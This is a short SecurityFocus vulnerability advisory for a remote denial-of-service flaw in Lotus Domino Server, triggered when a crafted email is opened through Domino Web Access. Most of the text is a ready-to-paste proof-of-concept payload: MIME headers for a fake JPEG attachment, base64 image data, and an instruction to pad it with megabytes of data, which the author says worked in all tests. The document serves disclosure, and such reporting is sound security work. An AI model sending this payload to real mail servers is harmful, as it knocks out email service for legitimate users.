source: http://www.securityfocus.com/bid/10641/info
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
(just paste all the lines below into the body of the mail)
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Content-Disposition: Attachment; filename="PC210017.JPG"
Content-Type: image/jpeg;
Name="PC210017.JPG"
Content-Transfer-Encoding: Base64
/9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA
ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB
AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN
[Add here some megabytes of data. 1kB is not enough, but 12MB was
sufficient in all my tests]
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Data
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